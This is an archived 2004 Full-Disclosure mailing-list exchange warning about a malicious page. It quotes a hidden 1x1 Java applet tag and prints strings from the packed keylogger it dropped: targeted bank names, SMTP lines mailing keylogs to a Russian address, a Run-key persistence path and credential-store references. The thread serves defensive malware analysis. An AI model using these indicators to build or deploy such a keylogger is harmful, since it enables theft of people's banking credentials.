| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: aditya.deshmukh at online.gateway.technolabs.net (Aditya, ALD [Aditya Lalit Deshmukh]) Subject: Re: http://federalpolice.com:article872@...5686747 this is a keylogger that will mail out your intresting logs to some russian address! so beware of this one, but what i couldent understand is how is this file executed ? -aditya > -----Original Message----- > From: full-disclosure-admin@...ts.netsys.com > [mailto:full-disclosure-admin@...ts.netsys.com]On Behalf Of > n.teusink@...net.nl > Sent: Sunday, February 15, 2004 11:40 PM > To: full-disclosure@...ts.netsys.com > Subject: [Full-Disclosure] Re: > http://federalpolice.com:article872@...5686747 > > > From the source of that page: > > APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1 HEIGHT=1 > > BlackBox.class is detected immediately by my virusscanner as > ClassLoader/E, more > info: > http://www.viruslibrary.com/virusinfo/Trojan.Java.ClassLoader.htm > > The javautil.zip appears to be an exe file renamed to zip. The > exe is compressed with > FSG. > > Interresting pieces of output from strings on the decompressed exe: > > > ----------------------------------------------BEGIN > HookerDll.Dll > Install > Uninstall > EDIT > %s\%s > WVS3 > \kgn.txt > Hooker.dll > Install > Uninstall > Westpac > bendigo > Bendigo > e-bendigo > e-Bendigo > commbank > Commonwealth > NetBank > Citibank > Bank of America > e-gold > e-bullion > e-Bullion > evocash > EVOCash > EVOcash > intgold > INTGold > paypal > PayPal > bankwest > Bank West > BankWest > National Internet Banking > cibc > CIBC > scotiabank > ScotiaBank > Scotia Bank > bank of montreal > Bank of Montreal > royalbank > Royal Bank > RoyalBank > tdwaterhouse > TD Canada Trust > TD Waterhouse > president's choice > President's Choice > President Choice > suncorpmetway > Suncorp > macquarie > Macquarie > INTgold > 1mdc > 1MDC > TD Waterhouse > goldmoney > GoldMoney > goldgrams > pecunix > Pecunix > Pecun!x > hyperwallet > HyperWallet > Wells Fargo > Bank One > Banesto > CAIXA > SunTrust > Sun Trust > Discover Card > Washington Mutual > Wachovia > desjardins > Chase > 0+060F0 > 1$11161J1U1i1 > 2.2I2\2 > 3'3,3E3c3h3r3 > 4%42484>4D4J4P4V4\4b4h4n4t4z4 > DATA > EHLO localhost > Subject: KeyLog from (%s) > MAIL FROM:<pentasatan@...l.ru> > RCPT TO:<pentasatan@...l.ru> > SOFTWARE\Microsoft\Windows\CurrentVersion\Run > open > pstorec.dll > PStoreCreateInstance > internet explorer > http:// > wininetcachecredentials > Cookie: > ----------------------------------------------END > > I think you can draw your own conclusions about this file. > > Niels > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > ________________________________________________________________________ Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com)
Powered by blists - more mailing lists